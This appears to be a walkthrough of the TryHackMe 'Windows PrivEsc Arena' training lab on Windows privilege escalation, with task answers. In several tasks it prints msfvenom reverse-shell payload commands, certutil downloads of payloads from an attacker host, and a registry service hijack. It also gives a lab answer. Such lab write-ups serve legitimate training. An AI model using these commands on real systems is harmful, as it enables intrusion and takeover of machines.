In this walk through, we will be going through the Windows PrivEsc Arena room from Tryhackme. This room is rated as Medium on the platform and teaches students about Windows privilege escalation techniques using a vulnerable Windows VM. So, let’s get started without any delay.

Table of Contents
Task 1 – Connecting to TryHackMe network

Task 2 – Deploy the vulnerable machine
Question 1 – Deploy the machine and log into the user account via RDP
Done


Question 2 – Open a command prompt and run ‘net user’. Who is the other non-default user on the machine?

TCM

Task 3 – Registry Escalation – Autorun
Question 1 – Click ‘Completed’ once you have successfully elevated the machine
Done



msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.1.78 LPORT=4444 -f exe -o shell.exe


certutil.exe -urlcache -f http://10.18.1.78:8000/program.exe program.exe

- Unable to write to the Autorun program folder as it requires Admin rights to write to it. However as per the accesschk output everyone had the Read and write access but was unable to replicate that in lab for some reason.
Task 4 – Registry Escalation – AlwaysInstallElevated
Question 1 – Click ‘Completed’ once you have successfully elevated the machine
Done



certutil.exe -urlcache -f http://10.18.1.78:8000/setup.msi setup.msi


Task 5 – Service Escalation – Registry
Question 1 – Click ‘Completed’ once you have successfully elevated the machine
Done

certutil.exe -urlcache -f http://10.18.1.78:8000/program.exe shell.exe

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\shell.exe /f net start regsvc


Task 6 – Service Escalation – Executable Files
Question 1 – Click ‘Completed’ once you have successfully elevated the machine
Done



Task 7 – Privilege Escalation – Startup Applications
Question 1 – Click ‘Completed’ once you have successfully elevated the machine
Done




Task 8 – Service Escalation – DLL Hijacking
Question 1 – Click ‘Completed’ once you have successfully elevated the machine
Done




msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.1.78 LPORT=4444 -f dll -o hijackme.dll

certutil.exe -urlcache -f http://10.18.1.78:8000/hijackme.dll hijackme.dll

net stop dllsvc & net start dllsvc

- I was unable to get a reverse shell back. Didn’t tried the route the walkthrough is intended to but should be worth a try.
Task 9 – Service Escalation – binPath
Question 1 – Click ‘Completed’ once you have successfully elevated the machine
Done


Task 10 – Service Escalation – Unquoted Service Paths
Question 1 – Click ‘Completed’ once you have successfully elevated the machine
Done




Task 11 – Potato Escalation – Hot Potato
Question 1 – Click ‘Completed’ once you have successfully elevated the machine
Done


Task 12 – Password Mining Escalation – Configuration Files
Question 1 – What is the cleartext password found in Unattend.xml?


password123
Task 13 – Password Mining Escalation – Memory
Question 1 – Click ‘Completed’ once you have successfully elevated the machine
Done





Task 14 – Privilege Escalation – Kernel Exploits
Question 1 – Click ‘Completed’ once you have successfully elevated the machine
Done




Also Read: Tryhackme – Watcher
So that was “Windows PrivEsc Arena” for you. In this room, we covered a variety of Windows privilege escalation techniques which we can use once we landed in a windows machine. Well, the best thing on any machine is to be admin or NT authority/System and today we have learned on how we can get to that point. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.